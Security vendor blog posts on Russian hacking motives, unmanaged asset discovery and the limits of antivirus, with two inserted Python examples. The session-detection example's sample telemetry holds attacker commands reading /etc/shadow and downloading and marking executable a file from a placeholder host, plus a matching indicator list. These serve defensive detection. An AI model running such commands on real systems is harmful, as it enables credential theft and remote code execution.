Russia has used cyberwarfare techniques to secure its influence in former Soviet territories (Estonia, 2007; Georgia, 2008; Ukraine, 2015).

Second, President Putin wants Russia to be a great power in geopolitics again. "Above all, we should acknowledge that the collapse of the Soviet Union was a major geopolitical disaster of the century," he said in 2005. Hacking the accounts of prominent people in political, academic, defense, technology and other institutions, so that operatives can leak the contents to embarrassing or outrageous effect, is a cheap way for Russia to discredit the US. The perception that Russia can influence election results in the US with a keystroke calls the legitimacy of US democracy into question and muddies discussion of similar issues in Russia. Together with other prestige-building efforts such as brokering the ceasefire talks in Syria (after leveling several cities), this approach could raise Russia's global profile.

Lastly, President Putin may harbor concerns about his own job security. Despite very favorable election results, according to Activities and Intentions, the protests of 2011 and 2012 still loom large in his mind. With several regimes in his neighborhood changing in the 2000s and 2010s (he called it an "epidemic of disintegration"), some of them as a result of intervention by NATO and the United States, President Putin is wary of Western interventionists who would not mind a similar outcome in Russia. A coordinated campaign could help discredit rivals and put the least aggressive candidates in power.

Given these reasons for Russian hacking, who are the most likely targets?

Given the overarching goals of discrediting the legitimacy of the United States and NATO and helping non-interventionist candidates where possible, government agencies, particularly those with roles in elections, are at the greatest risk. So too are campaign organizations and other politically connected NGOs such as think tanks, which have proven to be softer targets through which hackers gain access to sensitive information. It follows that any organization holding account information for, or access to, prominent people whose details could cause embarrassment or confusion for US political, business, academic and media institutions needs to be especially careful.

The next tier of risk is critical infrastructure. While the recent Washington Post reports of a compromised US electrical grid turned out to be overblown, Russia has genuinely hacked power grids and possibly other parts of physical infrastructure such as oil and gas. Beyond critical physical infrastructure, technology, finance, telecommunications and media could be targeted, as happened in Georgia and Estonia.

Finally, although the intelligence agencies' work over the past weeks has caught some heat for offering "obvious" recommendations, everyone really would benefit from the advice in the Homeland Security/FBI report, and in this blog about hardening your configuration by Ziften's Dr Al Hartmann. With major elections coming up this year in the critical NATO members the Netherlands, Germany and France, only one thing is guaranteed: it will be a busy year for Russian cyber operators, and these recommendations should be a top priority.

Your IT Security Starts With Asset Identification and Management – Charles Leaver

Written By Roark Pollock And Presented By Charles Leaver CEO Ziften


Trustworthy IT asset discovery and management can be a network and security admin's best friend.

I don't need to state the obvious; we all know a good security program begins with an inventory of every device connected to the network. But maintaining a current inventory of every connected device used by employees and business partners is hard. Harder still is making sure there are no unmanaged assets connected at all.

What is an Unmanaged Asset?

Networks can have thousands of connected devices. Among others, these may include:

– User devices such as laptops, desktop PCs, workstations, virtual desktops, bring-your-own devices (BYOD), smartphones and tablets.

– Cloud and data center devices such as servers, virtual machines (VMs), orphaned VMs, containers and storage systems.

– Networking devices such as switches, load balancers, firewalls and WiFi access points.

– Other devices such as printers and, more recently, Internet of Things (IoT) devices.

Unfortunately, many of these connected devices may be unknown to IT, or not governed by IT group policies. These unknown devices, and those not managed by IT policies, are referred to as "unmanaged assets."

The number of unmanaged assets keeps growing for many organizations. Ziften finds that as many as 30% to 50% of all connected devices can be unmanaged assets in today's enterprise networks.

IT asset management tools are typically optimized to identify assets such as PCs, servers, load balancers, firewalls and storage devices used to deliver business applications to the organization. However, these tools usually ignore assets the organization does not own, such as BYOD endpoints or user-deployed wireless access points. More troubling still, Gartner asserts in "Beyond BYOD to IoT, Your Business Network Access Policy Should Change" that IoT devices have surpassed employees and guests as the biggest users of the enterprise network.1

Gartner goes on to describe a new trend that will introduce even more unmanaged assets into the enterprise environment: bring your own thing (BYOT).

Essentially, employees bringing items designed for the smart home into the office environment. Examples include smart power sockets, smart kettles, smart coffee makers, smart light bulbs, domestic sensors, wireless webcams, plant care sensors, environmental controls and, eventually, home robots. Many of these things will be brought in by staff looking to make their working environment more congenial. These "things" can sense data, can be managed by apps and can communicate with cloud services.1

Why is it Essential to Identify Unmanaged Assets?

Quite simply, unmanaged assets create IT and security blind spots. Mike Hamilton, SVP of Product at Ziften, said, "Security starts with knowing exactly what physical and virtual devices are connected to the business network. But BYOD, shadow IT, IoT and virtualization are making that harder."

These blind spots not only increase security and compliance risk, they can increase legal risk. Information retention policies designed to limit legal liability are unlikely to be applied to electronically stored information held on unapproved virtual, mobile and cloud assets.

Maintaining an up-to-date inventory of the assets on your network is essential to good security. It's common sense: if you don't know it exists, you can't know whether it is secure. In fact, asset visibility is so important that it is a foundational part of most information security frameworks, including:

– SANS Critical Security Controls for Effective Cyber Defense: creating an inventory of authorized and unauthorized devices is first on the list.

– Council on CyberSecurity Critical Security Controls: creating an inventory of authorized and unauthorized devices is the first control in the focused list.

– NIST Information Security Continuous Monitoring for Federal Information Systems and Organizations, SP 800-137: information security continuous monitoring is defined as maintaining ongoing awareness of information security, vulnerabilities and threats to support organizational risk management decisions.

– ISO/IEC 27001 Information Security Management System Requirements: the standard requires that assets be clearly identified and that an inventory of all important assets be drawn up and maintained.

– Ziften's Adaptive Security Framework: the first pillar includes discovery of all your authorized and unauthorized physical and virtual devices.

Considerations in Evaluating Asset Discovery Solutions

There are multiple techniques for asset discovery and network mapping, and each has advantages and disadvantages. While evaluating the myriad tools, keep these two key considerations in mind:

Continuous versus point-in-time

Strong information security requires continuous asset identification no matter what method is used. However, many scanning techniques used in asset discovery take time to complete and are therefore run periodically. The downside of point-in-time asset identification is that transient systems may be on the network only briefly, so it is quite possible they will never be found.

Some discovery methods can trigger security alerts in network firewalls, intrusion detection systems or virus scanners. Because these methods can be disruptive, discovery is run only at regular, point-in-time intervals.

There are, however, asset discovery techniques that can be used continuously to locate and identify connected assets. Tools that provide continuous monitoring for unmanaged assets deliver much better unmanaged asset discovery results.


Passive versus active

Asset identification tools provide intelligence on every discovered asset, including IP address, hostname, MAC address, device manufacturer and device type. This helps operations teams quickly clean up their environments, removing rogue and unmanaged devices, even VM sprawl. But these tools gather that intelligence in different ways.

Tools that use active network scanning probe the network to coax responses from devices. Those responses offer clues that help identify and fingerprint the device. Active scanning periodically examines the network, or a segment of it, for devices connected at the time of the scan.

Active scanning can usually provide more thorough vulnerability analysis, malware detection, and configuration and compliance auditing. However, because of its disruptive interaction with security infrastructure, active scanning is run periodically, and so it risks missing transient devices and vulnerabilities that appear between scheduled scans.

Other tools use passive asset identification techniques. Because passive detection operates 24x7, it will find transient assets that may only be occasionally and briefly connected to the network, and it can send alerts when new assets appear.

In addition, passive discovery does not disturb sensitive devices on the network, such as industrial control systems, and it gives visibility into the Internet and cloud services being accessed from systems on the network. Passive discovery methods also avoid triggering alerts on security tools across the network.
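The point made in the two sections above, that a periodic scan can miss a device that is only briefly on the network while a passive listener that folds every observation into an inventory cannot, is easy to show in code. The following is an added example, not Ziften's product code. Everything in it is constructed: the DHCP/ARP-style observation lines, the tiny OUI-to-vendor table (real lookups use the IEEE registry), the list of "managed" MACs standing in for the IT asset tool's inventory, and the assumption that a device counts as present for 30 minutes after its last observation.

```python
"""Passive asset discovery versus point-in-time scanning (added example).

Builds an inventory from passively observed DHCP/ARP events, tags each asset
as managed or unmanaged, and shows which assets a scheduled scan would miss.
All data is constructed for illustration.
"""
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%S"

# Constructed observation log: timestamp, event, MAC, IP, hostname ("-" if none).
OBSERVATIONS = """\
2017-02-06T08:01:10 DHCPACK 00:50:56:a1:02:03 10.0.1.20  srv-app01
2017-02-06T08:03:41 ARP     3c:5a:b4:11:22:33 10.0.1.51  -
2017-02-06T08:05:02 DHCPACK 84:38:35:aa:bb:cc 10.0.1.77  jsmith-laptop
2017-02-06T10:02:15 DHCPACK d0:52:a8:01:02:03 10.0.1.120 -
2017-02-06T10:25:40 ARP     d0:52:a8:01:02:03 10.0.1.120 -
2017-02-06T14:00:05 ARP     00:50:56:a1:02:03 10.0.1.20  -
2017-02-06T14:00:09 ARP     84:38:35:aa:bb:cc 10.0.1.77  -
2017-02-06T14:00:12 ARP     3c:5a:b4:11:22:33 10.0.1.51  -
"""

# Constructed OUI table (first three octets -> vendor); illustrative only.
OUI_VENDORS = {
    "00:50:56": "VMware",
    "3c:5a:b4": "Google (Nest)",
    "84:38:35": "Apple",
    "d0:52:a8": "Physical Graph (SmartThings)",
}

# Constructed managed inventory: the MACs the IT asset tool already knows.
MANAGED_MACS = {"00:50:56:a1:02:03", "84:38:35:aa:bb:cc"}

# Assumption: a device is still "present" this long after its last observation.
PRESENCE_TTL = timedelta(minutes=30)

# Constructed scan schedule for the point-in-time comparison.
SCAN_SCHEDULE = ["2017-02-06T09:00:00", "2017-02-06T15:00:00"]


def parse_observations(text):
    """Yield (timestamp, mac, ip, hostname) from the observation log."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _event, mac, ip, host = line.split()
        yield (datetime.strptime(ts, TS_FMT), mac.lower(), ip,
               None if host == "-" else host)


def build_inventory(text):
    """Fold observations into one record per MAC: first/last seen, IPs, name, vendor."""
    assets = {}
    for ts, mac, ip, host in parse_observations(text):
        rec = assets.setdefault(mac, {
            "first_seen": ts, "last_seen": ts, "ips": set(), "hostname": None,
            "vendor": OUI_VENDORS.get(mac[:8], "unknown"),
            "managed": mac in MANAGED_MACS,
        })
        rec["first_seen"] = min(rec["first_seen"], ts)
        rec["last_seen"] = max(rec["last_seen"], ts)
        rec["ips"].add(ip)
        if host:  # DHCP carries a hostname; ARP does not, so keep the last one seen
            rec["hostname"] = host
    return assets


def unmanaged_assets(assets):
    """MACs the passive inventory saw that the managed inventory does not know."""
    return sorted(mac for mac, rec in assets.items() if not rec["managed"])


def seen_by_point_in_time_scan(assets, scan_times):
    """MACs a scheduled scan would find: present at one of the scan instants."""
    instants = [datetime.strptime(t, TS_FMT) for t in scan_times]
    found = set()
    for mac, rec in assets.items():
        present_until = rec["last_seen"] + PRESENCE_TTL
        if any(rec["first_seen"] <= t <= present_until for t in instants):
            found.add(mac)
    return found


def missed_by_scans(assets, scan_times):
    """Transient assets passive monitoring saw but the scan schedule never would."""
    return sorted(set(assets) - seen_by_point_in_time_scan(assets, scan_times))


if __name__ == "__main__":
    inv = build_inventory(OBSERVATIONS)
    for mac, rec in sorted(inv.items()):
        print(mac, rec["vendor"], rec["hostname"], sorted(rec["ips"]),
              "managed" if rec["managed"] else "UNMANAGED")
    print("unmanaged:", unmanaged_assets(inv))
    print("missed by 09:00/15:00 scans:", missed_by_scans(inv, SCAN_SCHEDULE))
```

With this data the SmartThings hub is on the network for under an hour between the two scheduled scans, so the scans never see it, while the passive inventory records it, its vendor and the fact that it is unmanaged. The same fold-and-compare loop is what a real passive listener does continuously; only the data source (a span port or DHCP server log instead of a constructed string) changes.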


BYOD, shadow IT, IoT, virtualization and Gartner's newly coined BYOT all mean more and more assets on the organization's network. Unfortunately, many of these assets are unknown to, or unmanaged by, IT, and these unmanaged assets present serious security holes. Removing these unmanaged assets from the network (they are far more likely to be "patient zero") or bringing them up to enterprise security standards significantly reduces an organization's attack surface and overall risk. The good news is that solutions exist that provide continuous, passive discovery of unmanaged assets.


Don’t Just Rely On Your Enterprise Antivirus – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver Ziften CEO


Dwindling Effectiveness of Enterprise Antivirus?

Google Security Guru Labels Antivirus Apps Ineffective 'Magic'

At the recent Kiwicon hacking conference in Wellington, New Zealand, Google's Platform Integrity team manager Darren Bilby preached cyber-security heresy. Charged with investigating highly sophisticated attacks, including the 2009 Operation Aurora campaign, Bilby lumped enterprise antivirus into a collection of ineffective tools installed to tick a compliance checkbox, but at the expense of real security:

We need to stop investing in those things we have shown are not effective... Antivirus does some useful things, but in reality it is more like a canary in the coal mine. It is worse than that. It's like we are standing around the dead canary saying 'Thank god it inhaled all the toxic gas.'

Google security experts aren't the first to weigh in against enterprise antivirus, or to draw unflattering analogies, in this case to a dead canary.

Another highly skilled security group, FireEye Mandiant, compared static defenses such as enterprise antivirus to that famously failed World War II defense, the Maginot Line:

Like the Maginot Line, today's cyber defenses are fast becoming a relic in today's threat landscape. Organizations spend billions of dollars each year on IT security. But hackers are easily outflanking these defenses with clever, fast-moving attacks.

An example came from a Cisco managed security services executive speaking at a conference in Poland. Their team had identified anomalous activity on one of their enterprise customers' networks and reported the suspected server compromise to the customer. To the Cisco team's astonishment, the customer simply ran an antivirus scan on the server, found no detections, and put it back into service. Alarmed, the Cisco team conferenced the customer in to their monitoring console and was able to show the attacker conducting a live remote session at that very moment, complete with typing mistakes and reissued commands to the compromised server. Finally convinced, the customer took the server down and completely re-imaged it. The enterprise antivirus had been a useless diversion: it had not served the customer and it had not deterred the attack.

So Is It Time to Get Rid of Enterprise Antivirus Now?

I am not yet ready to declare the end of the age of enterprise antivirus. But I do know that businesses have to invest in detection and response capabilities to complement conventional antivirus, and increasingly I wonder who is complementing whom.

Skilled, targeted attackers will reliably evade antivirus defenses, so against your most serious cyber threats, enterprise antivirus is essentially ineffective. As Darren Bilby said, it does do some useful things, but it does not provide the endpoint defense you need. So don't let it distract you from the highest-priority cyber-security investments, and don't let it distract you from the security measures that actually help.

Proven cyber defense measures include:

Configuration hardening of networks and endpoints.

Identity management with strong authentication.

Application controls.

Continuous network and endpoint monitoring, constant vigilance.

Strong encryption and data protection.

Staff education and training.

Continuous threat re-assessment, penetration testing, red/blue teaming.

In contrast to Bilby's criticism of enterprise antivirus, none of the above bullets is 'magic'. They are simply the ongoing work of adequate enterprise cyber-security.
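The Cisco anecdote above is a case for the "continuous network and endpoint monitoring" bullet: a one-off antivirus scan found nothing, while a monitor watching the live session could see an interactive remote login and the commands it issued. The following is an added example of that kind of monitoring logic, not Ziften code and not a reconstruction of the Cisco case. The endpoint telemetry lines, hostnames, user names, addresses, the baseline cutoff and the list of sensitive command indicators are all constructed; the detection rules (source address never seen before for that host and user, login outside business hours, commands touching sensitive paths) are assumptions chosen for illustration.

```python
"""Flag interactive remote sessions that fall outside a learned baseline.

Added example. Learns (host, user, source) triples from login events before a
cutoff, then groups later logins with the commands run in that session and
scores each session against a few simple rules. All data is constructed.
"""
from datetime import datetime

TS_FMT = "%Y-%m-%dT%H:%M:%S"

# Constructed endpoint telemetry: timestamp host event user src_ip [command].
EVENTS = """\
2017-01-09T09:12:00 web01 login ops 10.0.5.10
2017-01-09T09:12:30 web01 exec  ops 10.0.5.10 systemctl status nginx
2017-01-10T09:05:00 web01 login ops 10.0.5.10
2017-01-10T09:06:10 web01 exec  ops 10.0.5.10 tail /var/log/nginx/error.log
2017-01-11T23:41:02 web01 login ops 203.0.113.45
2017-01-11T23:41:20 web01 exec  ops 203.0.113.45 cat /etc/shadwo
2017-01-11T23:41:27 web01 exec  ops 203.0.113.45 cat /etc/shadow
2017-01-11T23:42:05 web01 exec  ops 203.0.113.45 curl -o /tmp/x http://203.0.113.9/x
2017-01-11T23:42:40 web01 exec  ops 203.0.113.45 chmod +x /tmp/x
2017-01-12T09:02:00 web01 login ops 10.0.5.10
"""

BASELINE_END = "2017-01-11T00:00:00"          # learn from logins before this instant
BUSINESS_HOURS = range(7, 19)                 # assumed normal admin hours (local)
SENSITIVE_INDICATORS = ("/etc/shadow", "/tmp/", "chmod +x")  # assumed, illustrative


def parse_events(text):
    """Parse telemetry lines into dicts; the command field is optional."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(None, 5)
        ts, host, event, user, src = parts[:5]
        events.append({"ts": datetime.strptime(ts, TS_FMT), "host": host,
                       "event": event, "user": user, "src": src,
                       "command": parts[5] if len(parts) > 5 else ""})
    return events


def learn_baseline(events, until):
    """(host, user, src) triples seen in interactive logins before `until`."""
    cutoff = datetime.strptime(until, TS_FMT)
    return {(e["host"], e["user"], e["src"])
            for e in events if e["event"] == "login" and e["ts"] < cutoff}


def group_sessions(events):
    """Attach each exec event to the most recent login for the same host/user/src."""
    sessions, open_by_key = [], {}
    for e in sorted(events, key=lambda e: e["ts"]):
        key = (e["host"], e["user"], e["src"])
        if e["event"] == "login":
            open_by_key[key] = {"host": e["host"], "user": e["user"], "src": e["src"],
                                "start": e["ts"], "commands": []}
            sessions.append(open_by_key[key])
        elif e["event"] == "exec" and key in open_by_key:
            open_by_key[key]["commands"].append(e["command"])
    return sessions


def detect(events, baseline_until):
    """Return one alert per post-baseline session that trips any rule."""
    baseline = learn_baseline(events, baseline_until)
    cutoff = datetime.strptime(baseline_until, TS_FMT)
    alerts = []
    for s in group_sessions(events):
        if s["start"] < cutoff:
            continue  # inside the learning window
        reasons = []
        if (s["host"], s["user"], s["src"]) not in baseline:
            reasons.append("new source %s for %s@%s" % (s["src"], s["user"], s["host"]))
        if s["start"].hour not in BUSINESS_HOURS:
            reasons.append("login outside business hours (%02d:00)" % s["start"].hour)
        hits = [c for c in s["commands"]
                if any(ind in c for ind in SENSITIVE_INDICATORS)]
        if hits:
            reasons.append("sensitive command: %s" % hits[0])
        if reasons:
            alerts.append({"host": s["host"], "user": s["user"], "src": s["src"],
                           "start": s["start"].strftime(TS_FMT),
                           "command_count": len(s["commands"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(EVENTS), BASELINE_END):
        print(a["start"], a["src"], a["command_count"], "commands;", "; ".join(a["reasons"]))
```

The 09:02 login on 12 January matches the baseline and trips nothing; the 23:41 session from the new address trips all three rules even though its first command is mistyped, because the rules score the session as a whole rather than any one line. That is the difference between a point-in-time scan and continuous monitoring: the scan asks "is there a known-bad file on disk right now", the monitor asks "is this activity normal for this host".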